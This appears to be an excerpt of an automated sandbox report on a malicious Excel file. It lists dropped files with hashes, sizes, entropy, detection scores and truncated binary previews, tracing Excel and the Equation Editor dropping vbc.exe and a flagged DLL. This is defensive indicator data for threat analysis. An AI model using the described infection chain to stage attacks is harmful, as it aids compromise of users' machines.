                                                                                                                                                                                                    SHA-256:4A12A767CE10484F112142993F120E52A0E5390071CA6F24CFC402F3C0548E3A
                                                                                                                                                                                                    SHA-512:D85DF3F75BD5E24001014CE6729BAAD8BE420624FFDA326D79E6C4A5830856AEB11F828AB7809B617610E697CA81D9E1393AF3CFB1CC18852A1E5709AC70A4D5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFFB160.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):51166
                                                                                                                                                                                                    Entropy (8bit):7.767050944061069
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                                                                                                                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                                                                                                                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                                                                                                                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                                                                                                                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D971BF97.jpeg
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 403x242, frames 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):22499
                                                                                                                                                                                                    Entropy (8bit):6.65776224633818
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:gtr6sgEVEVEVEVEV8uhjKs00xcg2g38THLMoYyz4g+xG:gtdgIIIII/KsLlr38Tu04gb
                                                                                                                                                                                                    MD5:37D204490B7E5C68D1CF8BA1D7BE31E4
                                                                                                                                                                                                    SHA1:F67D5AF4E5381CAB54973D69A8918E974280B795
                                                                                                                                                                                                    SHA-256:4A12A767CE10484F112142993F120E52A0E5390071CA6F24CFC402F3C0548E3A
                                                                                                                                                                                                    SHA-512:D85DF3F75BD5E24001014CE6729BAAD8BE420624FFDA326D79E6C4A5830856AEB11F828AB7809B617610E697CA81D9E1393AF3CFB1CC18852A1E5709AC70A4D5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC0841E1.jpeg
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):14198
                                                                                                                                                                                                    Entropy (8bit):7.916688725116637
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                                                                                                                                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                                                                                                                                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                                                                                                                                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                                                                                                                                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD1165B5.jpeg
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):14198
                                                                                                                                                                                                    Entropy (8bit):7.916688725116637
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                                                                                                                                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                                                                                                                                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                                                                                                                                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                                                                                                                                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E5A3FE6E.jpeg
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 396x275, frames 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):24075
                                                                                                                                                                                                    Entropy (8bit):6.730214296651396
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:oKr6BE4bXWRwgWHxVQ9T31pQO9v8IgLvt:oKcElRwfQ9T3cWiB
                                                                                                                                                                                                    MD5:09AFF1FCE05F6A872A9F9A75B7C645F5
                                                                                                                                                                                                    SHA1:5E8004FDCA739142B1AB20AD6BF773DE8C7B32FD
                                                                                                                                                                                                    SHA-256:00B28A518ACB867ABB2F0447DCEB07BD6E47005A1C608ACCF49A4EA3D96112F8
                                                                                                                                                                                                    SHA-512:355D944292FDCEC869EE28098B6CDF155EE7E697B3651F40538C34B68086DB370FF1D2B6C7306D71E4203734C73796EC6C9EE0C1F539E4F8F653575EE0FD66D9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E71324BD.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):79394
                                                                                                                                                                                                    Entropy (8bit):7.864111100215953
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\35ab8wlx6zqe82u0
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):164864
                                                                                                                                                                                                    Entropy (8bit):7.998989332403079
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:5Uc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlR:5Uc2SXli2LbG87uroXR585UcNKbbR
                                                                                                                                                                                                    MD5:9A9A459A5A231E0F2520C491C61FA1DA
                                                                                                                                                                                                    SHA1:7FD4E213B226ABE116437E168F0D27844B983592
                                                                                                                                                                                                    SHA-256:D0728A76A7BF4D436FAC8890A32E8C96B42CCD660B4E48927EB465E334598B1E
                                                                                                                                                                                                    SHA-512:F4CA81A0DB7340FB23AA4E21667838B8C88D5F3C84F47B48D77CD5CA5CE296C260F31B26A29187AB3739DD7196372D5FD40B5699B5D7D118E6C8E6328BCAE447
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: =n.....3@.1..*o..%..(..D.../.x.9....u..{..;.enPL!..#..0.6z.d.{j.......,k..Q.hP#.N.`*.F.76.l.....NZ.D....Mj.....c.e.4...j}A.8.G.GY..Z........M.(C........JF.Q..B.S.....F...m.fcF&HK........,.L,~...... ..Er....y`...0. .(`..s.C.'.9.@.Mg..d....v.EN$.R.W...x.6.\U..?m.V....oIf....U9T.6...>.E..x...+<C@mSf....s.v.......5..G.$o..1..]...(....zg.S.X9.\..ZnbsX@D.N..(I..r.....N...T......i....A...[_],.e....u.D...z~...?\..r.......1....}.....$..C.a.#~.n...#`..E~....fw]"..b..q....1.6 5.:N.~.'9.G o........./K=...._+.U..8...4.}...] ...C@.Bv....k9.h'.`E...zkI..:...r.d5.l.....iH8.P..H..2$"..k].^u.x.1........uX...^.....,/.}BHT...73..... ..My.BV^tV.^ $..r.l.:<+<..k...^.6./. .u......2....<..f`nz.6g^.Z......t..Ox.(.iBV`4.+.B.01..)...?..D..>.....~..'.dm....C..S..<...x<...P......`..&5<...>...u.}4.AQ~.._.V.3t5.......x...\._oF....2..............O-.(..H.TQo.....=...w7R.C...{...j7.Fm..[..<..}...3.."..~...]..*.x..9.........M<.......S:.b....'.e/K....q.m<..l.m..At._.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Cab75AD.tmp
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):58596
                                                                                                                                                                                                    Entropy (8bit):7.995478615012125
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                                                                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                                                                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                                                                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                                                                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):241332
                                                                                                                                                                                                    Entropy (8bit):4.206841657377403
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:cGSLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cPNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                                                                                                                    MD5:A5ACFBBB152C44BF4E97B87BDF8BEA98
                                                                                                                                                                                                    SHA1:AE0F93CBFB81A23DF4601B745DC81730C9926AD3
                                                                                                                                                                                                    SHA-256:6F588EC9C2352B1775B256184AFB69FB63799900386AABFA4EF4318E0F6DA7DD
                                                                                                                                                                                                    SHA-512:8E765013ED1D0CA8D4184CC2FF07B12B4FC0E6B9EEA9F922CEE09B4A75DF6B3830699D75C07B9FC0A0CA9B1E5070EA6AEE28812D0E0B2D270028F0ECE49FBF41
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Tar75AE.tmp
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):152788
                                                                                                                                                                                                    Entropy (8bit):6.309740459389463
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                                                                                                                                                                    MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                                                                                                                                                                    SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                                                                                                                                                                    SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                                                                                                                                                                    SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5120
                                                                                                                                                                                                    Entropy (8bit):4.171187189386588
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:StGht7Wr3QTZj0a6PTh7SKFt5ET9TbOGa4zzBvoAXAdUMQ9Bg6RuqS:jSrATZX6BD5EhTiGXHBgVueax
                                                                                                                                                                                                    MD5:7023C422B5D2571D6B132378437B1E9E
                                                                                                                                                                                                    SHA1:1F2C41B1E36DDA6ED420B5F8708AF6457F59A10D
                                                                                                                                                                                                    SHA-256:2BF1F784B019210A10EEF61E5AF8ABFBB9E02748CF9D6718F4BF6B3F72661779
                                                                                                                                                                                                    SHA-512:2659574EDE5079F0B522C01E0FD7FCDD4DED74D895650126979980221BA77582C01DEFA76DDDDA42BC73E4C5CC8268D4285DA29D6C438212503B6ED1529C596D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 19%, Browse
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: Purchase Order.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: eQLPRPErea.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Quotation Zhejiang.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L....m`...........!......................... ...............................`............@......................... !..P...\".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qmnajxcs95hz
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6661
                                                                                                                                                                                                    Entropy (8bit):7.96450606123374
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:mKamyP2+KBf3IfmRxQpCkEAEYfu6tOy7UUwv9:m91i9YsxnkBuN2Q
                                                                                                                                                                                                    MD5:56D7E12AB211686BE29BD8E00F4A46DA
                                                                                                                                                                                                    SHA1:AD4A22657ADE632D181D7C523F3203E76695B546
                                                                                                                                                                                                    SHA-256:0F8A856FF0A1A63EA5BBF83BF33C4B61B4444512A53FB43A8811705042DB3A39
                                                                                                                                                                                                    SHA-512:08C01CD9B8F8E5BC5AEA8E031DBA01DEABC85499AAFC3E9228B524C7A5AD2668280B4EBA535A79BAE4F57FF21D460998C0D6D13ADDF24F8D96926C382E8B6960
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ....&...:..W..i.....!...'K.Sx..:A8!<...;....4.....%.|...........v\...`Y~..NQ.v7..qQ# y..E\......s2...|...;..~.w%....|=...k....;{bL.._XQ9x..*H....4Mm..Ze..K....e.....1h....../n... ...h.R{l..`o.@....C.....W~A..CD~.d..*.67.R....[w..I'.....i...<A..Z..yr...?:/.S/...h....-..:AU.2.U.;..al....W70.bgu.?X......[..u.kRM..OH.i(...zX(+?..D]y....z;...}......a..".....>....."!..@.k\..P_.0q..R3O..*..'NQ..ST.5t....t..L...a.....2.o.{_5KJZm....(..$.{.....h[...Z.:'.W~....!..+..[..k....m..*.z..........X+.Ob;k..(.W?>..Y..GF.v..6.&.....M.(jsU..X.u.y....ih.O..4t...M1.:.tu6IB..!S\.!Mt.<xy:...w6...8.E....|...5....a./..x..i.|=r....@..........l.....-.......2..L..KT.............(..".,m.S..*#..#.`o.@.....V...cP..O.d.Uq.a...v.......PY.Aur.^...M\...y3.:.d.3....7^..~..8....S..I..=6}......5f..4a..6..O......=.....ur.~.;.'Vp.....4...p3.#n4.$et...=c..?...<.V~..Ga~...1|=.. t.@.....Z.gt.4........ Z.+.4u...&...K....^).8.Mh...D..V$...m.2]*....,.....m....Y..ND..~..H....../.#.
                                                                                                                                                                                                    C:\Users\user\Desktop\~$Bank Details.xlsx
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):330
                                                                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                    C:\Users\Public\vbc.exe
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):206065
                                                                                                                                                                                                    Entropy (8bit):7.915089020780882
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:NeYBCwqDxkJ0KBUc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlP4:NDIKUc2SXli2LbG87uroXR585UcNKbbQ
                                                                                                                                                                                                    MD5:2C64897AA30694CC768F5EA375157932
                                                                                                                                                                                                    SHA1:C897F37780A5237D5C330BCF2668745201B38FF5
                                                                                                                                                                                                    SHA-256:18D465A5867EE069480BB9BE8EB259BE41CC008E487B7B6A3CAD14E3559963A9
                                                                                                                                                                                                    SHA-512:6C1CFC20E4AAF0EE78B60A80C5FF559CB71AC31B62F2E9068638046CD3FEC5FE078F37DE85C50C65090B82D784931E07BDF692A597B14133EAE36AD143B3FEA2
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 16%, Browse
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: Purchase Order.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Quotation Zhejiang.xlsx, Detection: malicious, Browse
